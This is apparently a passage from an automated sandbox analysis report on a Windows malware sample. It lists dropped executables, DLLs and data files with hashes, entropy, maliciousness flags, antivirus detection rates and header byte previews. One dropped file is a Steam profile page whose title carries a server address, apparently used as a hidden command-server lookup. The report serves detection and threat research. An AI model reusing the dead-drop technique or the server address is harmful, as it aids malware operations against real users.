                                          Preview:MZP.....................@...............................................!..L.!..This program must be run under Win32..$7........................................................................................................................................PE..L....^B*.....................F......$.............@..........................@...................@..............................P........,..........................................................................................................CODE....D........................... ..`DATA....L...........................@...BSS.....H................................idata..P...........................@....tls.....................................rdata..............................@..P.reloc..............................@..P.rsrc....,.......,..................@..P.............@......................@..P........................................................................................................................................
                                          Process:C:\Users\user\Documents\SimpleAdobe\EEmC0rfrxeQDEUW4Qmh7BQX4.exe
                                          File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                          Category:dropped
                                          Size (bytes):685392
                                          Entropy (8bit):6.872871740790978
                                          Encrypted:false
                                          SSDEEP:12288:4gPbPpxMofhPNN0+RXBrp3M5pzRN4l2SQ+PEu9tUs/abAQb51FW/IzkOfWPO9UN7:4gPbPp9NNP0BgInfW2WMC4M+hW
                                          MD5:550686C0EE48C386DFCB40199BD076AC
                                          SHA1:EE5134DA4D3EFCB466081FB6197BE5E12A5B22AB
                                          SHA-256:EDD043F2005DBD5902FC421EABB9472A7266950C5CBACA34E2D590B17D12F5FA
                                          SHA-512:0B7F47AF883B99F9FBDC08020446B58F2F3FA55292FD9BC78FC967DD35BDD8BD549802722DE37668CC89EDE61B20359190EFBFDF026AE2BDC854F4740A54649E
                                          Malicious:true
                                          Antivirus:
                                          • Antivirus: ReversingLabs, Detection: 0%
                                          Reputation:unknown
                                          Preview:MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..L....4.c.........."!.........4......p.....................................................@A........................H...S...............x............F..P/.......#................................... ..................@............................text............................... ..`.rdata....... ......................@..@.data...<F...0......................@....00cfg..............................@..@.rsrc...x...........................@..@.reloc...#.......$..."..............@..B........................................................................................................................................................................................................................................................................................................................................................................................................
                                          Process:C:\Users\user\Documents\SimpleAdobe\7U1bGcxK3Lqi_XMHDNEdJrhB.exe
                                          File Type:JSON data
                                          Category:dropped
                                          Size (bytes):412
                                          Entropy (8bit):4.653613298613219
                                          Encrypted:false
                                          SSDEEP:12:YdYwpHEx6useCtrESQVctrESQVzR4heQ3htrESQV/m0mQP2JSnVR:YdXHD+CtrRQVctrRQVzRZQ3htrRQV/m0
                                          MD5:12B97C50A3579B5DCC80CC67A1204294
                                          SHA1:530B7C0DAA05B36B7C00CE1C16F9E6D9AAB27B1B
                                          SHA-256:B8EF550D8DD485A0809E6E5EAE64F57C1E77410E3B97EF446927CC453952638A
                                          SHA-512:BFB9D84A3DC2E7A6F98C16481A6D945628C04197C8FDAC1EE95D7DF6E1A273609E9B32C7E540D3EA9BC9F22D375E8361177E836825E228C8267AF41863D092E9
                                          Malicious:false
                                          Reputation:unknown
                                          Preview:{"ip":"8.46.123.175","country_code":"US","country":"United states of america","country_rus":"\u0421\u0428\u0410","country_ua":"\u0421\u0428\u0410","region":"New york","region_rus":"\u041d\u044c\u044e-\u0419\u043e\u0440\u043a","region_ua":"\u041d\u044c\u044e-\u0419\u043e\u0440\u043a","city":"New york city","city_rus":"\u041d\u044c\u044e-\u0419\u043e\u0440\u043a","latitude":"40.713192","longitude":"-74.006065"}
                                          Process:C:\Users\user\Desktop\CHA0VZiz8y.exe
                                          File Type:data
                                          Category:dropped
                                          Size (bytes):80900
                                          Entropy (8bit):6.015685534458922
                                          Encrypted:false
                                          SSDEEP:1536:hwqO1iqpNL3j/be40l3ZUAt3+0dXngDAYbqp8rAw0Fr/db+9X:WLbNL3Pj236AF+0dXqqpUAjzZ+9
                                          MD5:D2D86D809838DE2C03DBE2143FFE3F25
                                          SHA1:E742D2363DCE48EC2AA06ECF4AE5F09A567C5BAC
                                          SHA-256:245FBD2FD7DA4B6DC07E3A5E5BE0656D449213D99B668FB9F1A5E62D585D4405
                                          SHA-512:2CAA07185B532F2D6932805F0A26D4C8FBD755A62F274E15E88EB39138F31E1F54E62141559A8D33B02973F846AC8AFF2F38E4EC5134EDBD702E2E1AECD989E0
                                          Malicious:false
                                          Reputation:unknown
                                          Preview:..fUXO......................................................................4..Y.4A}|f5egzrgtx5vt{{za5wp5g`{5|{5QZF5xzqp;...1.......EP..q.....<...........7...%..!...............5...........5....................................u..........................5...............................u...............................F..-............................................................5..]...........;apma....&...5...!..................5..u;gfgv........u.......#..........................................................].......54...............8...3...........................................%..Y.......=....=.....k......|5......=..........|=U.........=....=....a....z.....=....?..=....?.k....8.g...e.....=....z....f.........k....?.k....?.......?C=....g"..ek....z....?.k....?..=....?Cf....=....a.........?..WF_W............c!;%;&%&$,......y.......6k..I.......6Fag|{rf....A...)...6@F.........6R@\Q...........6Wyzw...........BU.U.......&........4.......................U...................................
                                          Process:C:\Users\user\Documents\SimpleAdobe\EEmC0rfrxeQDEUW4Qmh7BQX4.exe
                                          File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                          Category:dropped
                                          Size (bytes):608080
                                          Entropy (8bit):6.833616094889818
                                          Encrypted:false
                                          SSDEEP:12288:BlSyAom/gcRKMdRm4wFkRHuyG4RRGJVDjMk/x21R8gY/r:BKgcRKMdRm4wFkVVDGJVv//x21R8br
                                          MD5:C8FD9BE83BC728CC04BEFFAFC2907FE9
                                          SHA1:95AB9F701E0024CEDFBD312BCFE4E726744C4F2E
                                          SHA-256:BA06A6EE0B15F5BE5C4E67782EEC8B521E36C107A329093EC400FE0404EB196A
                                          SHA-512:FBB446F4A27EF510E616CAAD52945D6C9CC1FD063812C41947E579EC2B54DF57C6DC46237DED80FCA5847F38CBE1747A6C66A13E2C8C19C664A72BE35EB8B040
                                          Malicious:true
                                          Antivirus:
                                          • Antivirus: ReversingLabs, Detection: 0%
                                          Reputation:unknown
                                          Preview:MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..L....4.c.........."!.........^......................................................j.....@A.........................`...W.....,.... ..................P/...0...A...S..............................h.......................Z.......................text...a........................... ..`.rdata..............................@..@.data...D...........................@....00cfg..............................@..@.tls................................@....rsrc........ ......................@..@.reloc...A...0...B..................@..B................................................................................................................................................................................................................................................................................................................................................................
                                          Process:C:\Users\user\Documents\SimpleAdobe\EEmC0rfrxeQDEUW4Qmh7BQX4.exe
                                          File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                                          Category:dropped
                                          Size (bytes):450024
                                          Entropy (8bit):6.673992339875127
                                          Encrypted:false
                                          SSDEEP:12288:McPa9C9VbL+3Omy5CvyOvzeOKdqhUgiW6QR7t5s03Ooc8dHkC2esGAWf:McPa90Vbky5CvyUeOKn03Ooc8dHkC2eN
                                          MD5:5FF1FCA37C466D6723EC67BE93B51442
                                          SHA1:34CC4E158092083B13D67D6D2BC9E57B798A303B
                                          SHA-256:5136A49A682AC8D7F1CE71B211DE8688FCE42ED57210AF087A8E2DBC8A934062
                                          SHA-512:4802EF62630C521D83A1D333969593FB00C9B38F82B4D07F70FBD21F495FEA9B3F67676064573D2C71C42BC6F701992989742213501B16087BB6110E337C7546
                                          Malicious:false
                                          Antivirus:
                                          • Antivirus: ReversingLabs, Detection: 0%
                                          Reputation:unknown
                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........1C.._..._..._.)n...._......._...^."._..^..._..\..._..[..._..Z..._.._..._......_..]..._.Rich.._.........................PE..L.....0].........."!.....(..........`........@......................................,.....@A.........................g.......r...........................A.......=..`x..8............................w..@............p.......c..@....................text....&.......(.................. ..`.data...H)...@.......,..............@....idata.......p.......D..............@..@.didat..4............X..............@....rsrc................Z..............@..@.reloc...=.......>...^..............@..B................................................................................................................................................................................................................................................................
                                          Process:C:\Users\user\Desktop\CHA0VZiz8y.exe
                                          File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                          Category:dropped
                                          Size (bytes):3134464
                                          Entropy (8bit):7.987488694347116
                                          Encrypted:false
                                          SSDEEP:49152:sa24nrYoeu14yHYne7V64z4APA5EtaUi7YcI5NtMQQDF4PAxf0NQdX1fwCm:Dncol14y4e7Vm0xaMcojM/DMAxf0yXF9
                                          MD5:F57F726F9E1B8C24B4F7C275FFAC78CF
                                          SHA1:339FED05D2D4A963E734E22741C89979D6B68B73
                                          SHA-256:AC9BF57379A94E559528BA283CBF74BF0DACF647CBB7F485437C361246FBD123
                                          SHA-512:C5BE34173BF2B710C57B4497A065FE19FB9DD62459EDFF56FDCC85363CCEDB53FC39989ED287DD07295A15E8DC86BF7902C68BD23E2B765CFC5B0ED94B56FA8F
                                          Malicious:true
                                          Reputation:unknown
                                          Preview:MZ......................@................................... ...........!..L.!This program cannot be run in DOS mode....$.......j.....s...s...s.e.p.%.s.e.v...s.e.t./.s..y..*.s..yw.=.s..yp.4.s..yv.u.s.e.w.6.s.e.u./.s.e.r.5.s...r...s..zz.2.s..z../.s..../.s..zq./.s.Rich..s.................PE..L....iLf...............'.....|..................@......................................@... .. .... .. ..........P.......,........`..4...................0........................................................................................................<..................@........................@..............@............P...P.......B..............@............ ...........J..............@....................b...J..............@....rsrc.... ...`......................@..@.........`y......(..................@....data.....!.......!.................@...................................................................................................................................................
                                          Process:C:\Users\user\Documents\SimpleAdobe\EEmC0rfrxeQDEUW4Qmh7BQX4.exe
                                          File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                          Category:dropped
                                          Size (bytes):2046288
                                          Entropy (8bit):6.787733948558952
                                          Encrypted:false
                                          SSDEEP:49152:fECf12gikHlnKGxJRIB+y5nvxnaOSJ3HFNWYrVvE4CQsgzMmQfTU1NrWmy4KoAzh:J7Tf8J1Q+SS5/nr
                                          MD5:1CC453CDF74F31E4D913FF9C10ACDDE2
                                          SHA1:6E85EAE544D6E965F15FA5C39700FA7202F3AAFE
                                          SHA-256:AC5C92FE6C51CFA742E475215B83B3E11A4379820043263BF50D4068686C6FA5
                                          SHA-512:DD9FF4E06B00DC831439BAB11C10E9B2AE864EA6E780D3835EA7468818F35439F352EF137DA111EFCDF2BB6465F6CA486719451BF6CF32C6A4420A56B1D64571
                                          Malicious:true
                                          Antivirus:
                                          • Antivirus: ReversingLabs, Detection: 0%
                                          Reputation:unknown
                                          Preview:MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..L....4.c.........."!................`........................................p......l- ...@A.........................&..........@....P..x...............P/...`..\...................................................|...\....&..@....................text............................... ..`.rdata..l...........................@..@.data...DR..........................@....00cfg.......@......................@..@.rsrc...x....P......................@..@.reloc..\....`......................@..B........................................................................................................................................................................................................................................................................................................................................................................................................
                                          Process:C:\Users\user\Desktop\CHA0VZiz8y.exe
                                          File Type:PE32+ executable (GUI) x86-64, for MS Windows
                                          Category:dropped
                                          Size (bytes):228864
                                          Entropy (8bit):6.12511745585131
                                          Encrypted:false
                                          SSDEEP:3072:tneBqhy5aVLOwqI8sgwoEHXfwaNUM+/ORSs5G2Ms4f6TFZbhgvbUxzJ8Y:tETlsgOfDt+/V6JQO98
                                          MD5:3955AF54FBAC1E43C945F447D92E4108
                                          SHA1:53C5552C3649619E4E8C6A907B94573F47130FA4
                                          SHA-256:E6DE332AD778F7A7CF160EFA60656C3AC960DC77806905493D5CFFE58EE1DE16
                                          SHA-512:FA028A040A5F075296AEBAB7F63A59B6CBBA32EE0964DFC08768396CC012FF5D861191E2478914D79D4A424C3BBA110505A58B97376C44C716F0B1EA70551037
                                          Malicious:true
                                          Antivirus:
                                          • Antivirus: ReversingLabs, Detection: 46%
                                          Reputation:unknown
                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......7...sto@sto@sto@!.lA{to@!.jALto@!.kAoto@z..@ato@..nAzto@stn@.to@..jA~to@..mArto@Richsto@........PE..d...A%"^.........."......r..........`;.........@....................................)7....`..................................................o..........0...........................0&..T....................'..(....&..................h............................text....q.......r.................. ..`.rdata..D............v..............@..@.data................f..............@....pdata...............t..............@..@.rsrc...............................@..@.reloc...............v..............@..B................................................................................................................................................................................................................................................................................
                                          Process:C:\Users\user\Documents\SimpleAdobe\EEmC0rfrxeQDEUW4Qmh7BQX4.exe
                                          File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                          Category:dropped
                                          Size (bytes):257872
                                          Entropy (8bit):6.727482641240852
                                          Encrypted:false
                                          SSDEEP:6144:/yF/zX2zfRkU62THVh/T2AhZxv6A31obD6Hq/8jis+FvtVRpsAAs0o8OqTYz+xnU:/yRzX2zfRkX2T1h/SA5PF9m8jJqKYz+y
                                          MD5:4E52D739C324DB8225BD9AB2695F262F
                                          SHA1:71C3DA43DC5A0D2A1941E874A6D015A071783889
                                          SHA-256:74EBBAC956E519E16923ABDC5AB8912098A4F64E38DDCB2EAE23969F306AFE5A
                                          SHA-512:2D4168A69082A9192B9248F7331BD806C260478FF817567DF54F997D7C3C7D640776131355401E4BDB9744E246C36D658CB24B18DE67D8F23F10066E5FE445F6
                                          Malicious:true
                                          Antivirus:
                                          • Antivirus: ReversingLabs, Detection: 0%
                                          Reputation:unknown
                                          Preview:MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..L....4.c.........."!................P...............................................Sg....@A........................Dv..S....w..........................P/.......5..8q...............................................{...............................text...&........................... ..`.rdata.............................@..@.data................|..............@....00cfg..............................@..@.rsrc...............................@..@.reloc...5.......6..................@..B........................................................................................................................................................................................................................................................................................................................................................................................................
                                          Process:C:\Users\user\Documents\SimpleAdobe\EEmC0rfrxeQDEUW4Qmh7BQX4.exe
                                          File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                                          Category:dropped
                                          Size (bytes):80880
                                          Entropy (8bit):6.920480786566406
                                          Encrypted:false
                                          SSDEEP:1536:lw2886xv555et/MCsjw0BuRK3jteo3ecbA2W86b+Ld:lw28V55At/zqw+Iq9ecbA2W8H
                                          MD5:A37EE36B536409056A86F50E67777DD7
                                          SHA1:1CAFA159292AA736FC595FC04E16325B27CD6750
                                          SHA-256:8934AAEB65B6E6D253DFE72DEA5D65856BD871E989D5D3A2A35EDFE867BB4825
                                          SHA-512:3A7C260646315CF8C01F44B2EC60974017496BD0D80DD055C7E43B707CADBA2D63AAB5E0EFD435670AA77886ED86368390D42C4017FC433C3C4B9D1C47D0F356
                                          Malicious:false
                                          Antivirus:
                                          • Antivirus: ReversingLabs, Detection: 0%
                                          Reputation:unknown
                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$......................08e...................................................u............Rich............PE..L...|.0].........."!.........................................................0.......m....@A.............................................................A... ....... ..8............................ ..@............................................text............................... ..`.data...............................@....idata..............................@..@.rsrc...............................@..@.reloc....... ......................@..B................................................................................................................................................................................................................................................................................................................................
                                          Process:C:\Users\user\Desktop\CHA0VZiz8y.exe
                                          File Type:PE32+ executable (GUI) x86-64, for MS Windows
                                          Category:dropped
                                          Size (bytes):11403264
                                          Entropy (8bit):7.976262170621303
                                          Encrypted:false
                                          SSDEEP:196608:SYvZvPF60956XHt6+YF+ELzL2Zjbn2YH0oD6DGcCwHbGkG:3Fcw5kHo5F+E+j7260oOYc
                                          MD5:D43AC79ABE604CAFFEFE6313617079A3
                                          SHA1:B3587D3FA524761B207F812E11DD807062892335
                                          SHA-256:8B750884259DD004300A84505BE782D05FCA2E487A66484765A4A1E357B7C399
                                          SHA-512:BB22C73ED01FF97B73FEB68AE2611B70EF002D1829035F58A4BA84C5A217DB368AAE8BDC02CDEC59C1121922A207C662AA5F0A93377537DA42657DD787587082
                                          Malicious:true
                                          Antivirus:
                                          • Antivirus: ReversingLabs, Detection: 92%
                                          Reputation:unknown
                                          Preview:MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..d...._3f..........#..........,......`..........@.......................................... .................................................06..d.......X,...Y...*..............................................(....W..8...............h............................text....~.......................... ..`.rdata..............................@..@.data...............................@....pdata..............................@..@.00cfg..............................@..@.tls................................@....text0....,......................... ..`.text1..8...........................@....text2............................`..h.rsrc...X,.........................@..@........................................................................................................................................................................................................................
                                          Process:C:\Users\user\Desktop\CHA0VZiz8y.exe
                                          File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                          Category:dropped
                                          Size (bytes):4795544
                                          Entropy (8bit):7.790038180467164
                                          Encrypted:false
                                          SSDEEP:98304:ltzqmVRdoYb1nmPuPeHpxCHleUtEz7M9TrZHYErpLHE3OJots3fYa:ltZVR2uwU7EwtrNUs3ff
                                          MD5:6151F5177B7B35E3D7CEE99A2FC9AF24
                                          SHA1:2E0C8320FC5C6E11CFFB6A1A5085DB450F0BAF08
                                          SHA-256:1186878B54CD5CE32FFE84632051A57E9B62C7243187DB25BBAC6C57D2AD67AF
                                          SHA-512:69A536208B7E228E0AD51842AA00BA3FAEE4C29D952C15DFE90F8C58A3C7AC3CCE61E0FDEAEA2615FC6268459820F468543D52CF62AFD4D2A026E2A517B63031
                                          Malicious:true
                                          Antivirus:
                                          • Antivirus: ReversingLabs, Detection: 79%
                                          Reputation:unknown
                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....iLf...............'.............3S...........@...........................|.....i.J...@.................................t.L.@.....o..-............H..t....o...............................3. .....o.@............ U.....(#D.@....................text.............................. ..`.rdata..2~..........................@..@.data...0I...P......................@....vmp...x..........................`..`.vmp...u>.. 1..v>.................`..`.reloc........o......z>.............@..@.rsrc....-....o..8....>.............@..@........................................................................................................................................................................................................................................................................................................................................................
                                          Process:C:\Users\user\Desktop\CHA0VZiz8y.exe
                                          File Type:data
                                          Category:dropped
                                          Size (bytes):5382676
                                          Entropy (8bit):6.621303166870253
                                          Encrypted:false
                                          SSDEEP:49152:W5KEy9wHfooOKqF6kJeGxPLG5xmMI99XMt6ZtPftR0nnZFW2B0LaHk:WyIE0kJDjG5xmMg9XMtctXn0ZrB0
                                          MD5:1358D8A929702CA16BB92ADBFA251F76
                                          SHA1:121C2543BF1D508ACCDBC613C8123986C84E5CD2
                                          SHA-256:15F6A2B2FD9FB56E6B569A36503F0A01E387BAB47BA3BF8E24963FC39572D60B
                                          SHA-512:EAA64FE16709DBB6781AE5D2C70237DB011BBF27A3ED6BF6B73B4C81D822D8DB03203D1BD29D5D71FCB735325F64E369B0DA870FD5692300D317636A7094C8E4
                                          Malicious:false
                                          Reputation:unknown
                                          Preview:..fUXO......................................................................4..Y.4A}|f5egzrgtx5vt{{za5wp5g`{5|{5QZF5xzqp;...1.........e.......................e...........k>......k>.....k>......k>.................O...Z=.....Z=..............Z=......G|v}....................EP..Y.....Xs...............2..4..........X\.......4..............................ey......8G.......................................?.......0......................uy...............................?.....................................................55555555..4....../..................5..u55555555[.....4......+..................55555555.....e1......#..................;gfgv.........0......S..................55555555!.....<..C...=.................W;|qtat........?......k..................;ayf..........?.........................;a}px|qt..T...?...T.................u...;gpyzv.......uy......7G.....................................................................................................................................
                                          Process:C:\Users\user\Desktop\CHA0VZiz8y.exe
                                          File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                          Category:dropped
                                          Size (bytes):2793749
                                          Entropy (8bit):7.945099975459654
                                          Encrypted:false
                                          SSDEEP:49152:ppUlRhkDckBkgWRMvmHxDhii7w5utZQohYXUA+6QHRUa2:ppUlwck+gWFHxDscOufskBUh
                                          MD5:32D986D13D2B4B6ACDC7ACE345D66BD4
                                          SHA1:9C3EF3B84F259FF84C4B9D79B40ADF5E7D83340E
                                          SHA-256:CD0B3A30E1FBEF7E9BD8CDCD5A2169F7343F4C9C43865FC65CA8B2CBF6976D73
                                          SHA-512:11F14E2064AE55FFE6E85CAE67CFE9EA724979175CBC1E217D4C642939AC1560C2E36DED025DEAD789B0192FD01D81AEE47B56C53FFB8E826752049D74E7AD4B
                                          Malicious:true
                                          Reputation:unknown
                                          Preview:MZ......................@................................... ...........!..L.!This program cannot be run in DOS mode....$.......v..p2.b#2.b#2.b#.E.#?.b#.E.#..b#.E.#*.b#...#0.b#..f"!.b#..a"*.b#..g"..b#;..#9.b#;..#5.b#2.c#,.b#..g"..b#..b"3.b#...#3.b#..`"3.b#Rich2.b#........................PE..L.....@f...............!.............e............@.......................................@.........................p}..4....}..P.......`....................p...*...E..T....................F......X...@...................,r.. ....................text...,........................... ..`.rdata..............................@..@.data................t..............@....didat.......p......................@....rsrc...`...........................@..@.reloc...*...p...,...l..............@..B................................................................................................................................................................................................................................
                                          Process:C:\Users\user\Desktop\CHA0VZiz8y.exe
                                          File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                          Category:dropped
                                          Size (bytes):7595262
                                          Entropy (8bit):7.996899559951484
                                          Encrypted:true
                                          SSDEEP:196608:91O5nvaGdWgO+iCmuKFbReaGO/31RZQpbtElhEe:3OBvaGdWgP01FdZQVeP
                                          MD5:3542F60DFEF8BA16451AB6097587BF63
                                          SHA1:290FD517CC5834D1216702DBA769B2A286017E7F
                                          SHA-256:F08C7E5C8715AAE484AC4B4365249EA0374B5CD321D0CDB316FD550086A676EE
                                          SHA-512:937B842A135C2BC110EBEF75A841141CDF05AEB9AC9364580F7D6A61C6EC7378C979E0C775CB64D210AEF6EFC95AF8C830860350673BA76D8DFBEF379A27947D
                                          Malicious:true
                                          Reputation:unknown
                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$..........W..s...s...s...}...s...y..s...,...s...r.!.s.......s...x..s.......s.......s.^.u...s.Rich..s.........PE..L....S.L.............................K............@.............................................................................d....p..`............................................................................................................text.............................. ..`.rdata...D.......F..................@..@.data...HZ.......2..................@....sxdata......`......................@....rsrc...`....p......................@..@................................................................................................................................................................................................................................................................................................................................
                                          Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                          File Type:HTML document, Unicode text, UTF-8 text, with very long lines (3063), with CRLF, LF line terminators
                                          Category:dropped
                                          Size (bytes):35682
                                          Entropy (8bit):5.380816439744813
                                          Encrypted:false
                                          SSDEEP:768:s7pqLtWYmwt5D0gqOaiNGA7PzzgiJmDzJtxvrfukPco1AUmPzzgiJmDzJtxvJ2ST:s78LtWYmwt5D0gqOac7PzzgiJmDzJtx/
                                          MD5:354B2819B1E89FF674418D3033EB630F
                                          SHA1:287EE9D4532CD5384334F50267A38073E915BDFF
                                          SHA-256:93C56387E1F9B1C8EE832FAA46571C397E862D94E7D539353EEB0828D9BDB304
                                          SHA-512:806DFB263C0C5AC0949E7970A46138E0609460EF152B57E0AB198F08C663F9686A27C891C7FA13CFF5603B9D7C79D721699353A62BACF1A442E303B20CD13153
                                          Malicious:false
                                          Reputation:unknown
                                          Preview:<!DOCTYPE html>..<html class=" responsive" lang="en">..<head>...<meta http-equiv="Content-Type" content="text/html; charset=UTF-8">.....<meta name="viewport" content="width=device-width,initial-scale=1">....<meta name="theme-color" content="#171a21">....<title>Steam Community :: r0is https://65.109.242.59|</title>...<link rel="shortcut icon" href="/favicon.ico" type="image/x-icon">...........<link href="https://community.cloudflare.steamstatic.com/public/shared/css/motiva_sans.css?v=GfSjbGKcNYaQ&amp;l=english&amp;_cdn=cloudflare" rel="stylesheet" type="text/css" >.<link href="https://community.cloudflare.steamstatic.com/public/shared/css/buttons.css?v=tuNiaSwXwcYT&amp;l=english&amp;_cdn=cloudflare" rel="stylesheet" type="text/css" >.<link href="https://community.cloudflare.steamstatic.com/public/shared/css/shared_global.css?v=E0c90DJSB6Ld&amp;l=english&amp;_cdn=cloudflare" rel="stylesheet" type="text/css" >.<link href="https://community.cloudflare.steamstatic.com/public/css/globalv2.cs
                                          Process:C:\Users\user\Desktop\CHA0VZiz8y.exe
                                          File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                          Category:dropped
                                          Size (bytes):4791448
                                          Entropy (8bit):7.801357729474096
                                          Encrypted:false
                                          SSDEEP:98304:fvlJEFn6D4/425BLJxuixbvOprXQPmVR64t6Grx+ts3fY:fvlGiS3lPr7OqOR6oMs3f
                                          MD5:9A78F27AA9D999EEE10CB154BA964869
                                          SHA1:D1AF2D2D1195415791F59285A9BCFA5EE0880EBD
                                          SHA-256:CF53B17C2ABC3B8AC0B149E2496726C5C7D67EC0712F56339F2870CA6D616DB6
                                          SHA-512:B0AB7D1A8492A1A318C10E7402CF36EF22BF80DB77AAC33F744296DCD01B17E438D65D2371FC733AEC28C671CD90DBF6CECB9BC23A9DB1163F183FEB70C7709C
                                          Malicious:true
                                          Antivirus:
                                          • Antivirus: ReversingLabs, Detection: 75%
                                          Reputation:unknown
                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....iLf...............'.............5i...........@...........................|.....j.I...@.................................@tl.@.....o..-............H..t....o...............................:. ....lo.@.............m......]l.@....................text.............................. ..`.rdata..2~..........................@..@.data...0I...P......................@....vmp..$m..........................`..`.vmp...d>...1..f>.................`..`.reloc........o......j>.............@..@.rsrc....-....o..8...p>.............@..@........................................................................................................................................................................................................................................................................................................................................................
                                          Process:C:\Users\user\Documents\SimpleAdobe\FIxDICT7hSLYFeTzbHHqKZ7Z.exe
                                          File Type:JPEG image data, JFIF standard 1.01, resolution (DPI), density 96x96, segment length 16, comment: "CREATOR: gd-jpeg v1.0 (using IJG JPEG v80), quality = 85", baseline, precision 8, 600x800, components 3
                                          Category:dropped
                                          Size (bytes):1789609
                                          Entropy (8bit):7.469477439461062
                                          Encrypted:false
                                          SSDEEP:49152:r8Bu6jeTAcNmspkiTYh2zmlr7hT91hoavGtHJBpCbqag/8PTUb:wBDC7VpNYhu2PhTXh78aq8b+
                                          MD5:6FEB0D1252D06D306EE397ABE3561270
                                          SHA1:465D534EEA6223CFAE671266DF760F2E590EC62B
                                          SHA-256:42C8A15537D7656A0779E75654D016975C70C9E81071B4E9D300AA808359C2E9
                                          SHA-512:CA2F4BA811FD235063AE448907476E2162CDF7734B4BF8CB48B4949D538CE1F6568B4E15211AC2E116BD5B40836CA21B156F80640427D2317A444FF6533A5B23
                                          Malicious:false
                                          Reputation:unknown
                                          Preview:......JFIF.....`.`.....;CREATOR: gd-jpeg v1.0 (using IJG JPEG v80), quality = 85....C..............................................!........."$".$.......C....................................................................... .X.."............................................................}........!1A..Qa."q.2....#B...R..$3br........%&'()*456789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz..............................................................................................................................w.......!1..AQ.aq."2...B.....#3R..br...$4.%.....&'()*56789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz....................................................................................?....(...(...(...(...(...(...(...........:.2.C$0)..%..!....2.\........l.&;........2G.Z..r85...+....l.' +D.P9..b..R..2.....r^(...+.=....U.uy=...E.+. ....,.2#_..9..d.{..(.b.....;SHA.Q.....E..t..Z?...E-...R..P.QK.Q@.E-%..R.%.(c2K"F..1....+.o.x}$1E.Ey7x.......1..15..../.j..4......`..n.Y...J..zu.....R?.....m..L.
                                          Process:C:\Users\user\Desktop\CHA0VZiz8y.exe
                                          File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                          Category:dropped
                                          Size (bytes):4815512
                                          Entropy (8bit):7.796002238696443
                                          Encrypted:false
                                          SSDEEP:98304:+yjDqWHejZxTbsZFmVRVMGGLwMjzfq/+gIopszmuJDRXts3fYw:+uz+jZuyWTzjzp1opszZL9s3fF
                                          MD5:C0FEE8DB6325C8C1B3F8CCD13574C65A
                                          SHA1:2DDC159F8A06218C7622C7CD107598BE1FBD3C99
                                          SHA-256:D177DC7BA9F3E8511B08293B8CF92AF0BA4DEDD029C9F8365FCF05AFA8375344
                                          SHA-512:76ED65DC22149C9263C83D73D16A08E99B9137E619FE26AF852ACC2B4AF127C43BD5C6DD2BD16BA117C3432E1422F54157FE6CCB6E9D997E02C776BD52A26BF9
                                          Malicious:true
                                          Antivirus:
                                          • Antivirus: ReversingLabs, Detection: 67%
                                          Reputation:unknown
                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....iLf...............'.............P...........@..........................0}.......I...@..................................F2.@.....p..-............I..t....o...............................9. .....o.@.............O.......E.@....................text.............................. ..`.rdata..2~..........................@..@.data...0I...P......................@....vmp...|..........................`..`.vmp....>.. 1...>.................`..`.reloc........o.......>.............@..@.rsrc....-....p..8....>.............@..@........................................................................................................................................................................................................................................................................................................................................................
                                          Process:C:\Users\user\Desktop\CHA0VZiz8y.exe
                                          File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                          Category:dropped
                                          Size (bytes):2121216
                                          Entropy (8bit):6.847277642413426
                                          Encrypted:false
                                          SSDEEP:49152:s4K3x1vU2JtTF+TxMoxc1TU+j+dAzGwlrh:s4Ex182tIuoITsdZ
                                          MD5:E22EFC95638F4C4E07FD7DABA5BD3154
                                          SHA1:DB73B614E897241D5321DC46EC25A302958ECD84
                                          SHA-256:11BDA3957B2FD86E57B1677149C0558686C11E31AE500F671D4D9A44F6E6F48F
                                          SHA-512:84DAC88794F1692CCB88F09A6F8EDFF231E9524F79CD8AF40414ACDBACAFBFE3FC1C79D9CC9A4A9190EB9CEF02D23247129E8461875176840E96641375B75122
                                          Malicious:true
                                          Reputation:unknown
                                          Preview:MZP.....................@...............................................!..L.!..This program must be run under Win32..$7........................................................................................................................................PE..L....^B*.....................P............... ....@........................... ..................@...........................`..J"...p...D......................<...................................................................................CODE................................ ..`DATA.....&... ...(..................@...BSS.....-....P.......6...................idata..J"...`...$...6..............@....tls.................Z...................rdata...............Z..............@..P.reloc..<............\..............@..P.rsrc....D...p...D..................@..P.............. ......^ .............@..P........................................................................................................................................
                                          Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                          File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                          Category:modified
                                          Size (bytes):2459136
                                          Entropy (8bit):6.052474106868353
                                          Encrypted:false
                                          SSDEEP:49152:WHoJ9zGioiMjW2RrL9B8SSpiCH7cuez9A:WHoJBGqabRnj8JY/9
                                          MD5:90E744829865D57082A7F452EDC90DE5
                                          SHA1:833B178775F39675FA4E55EAB1032353514E1052
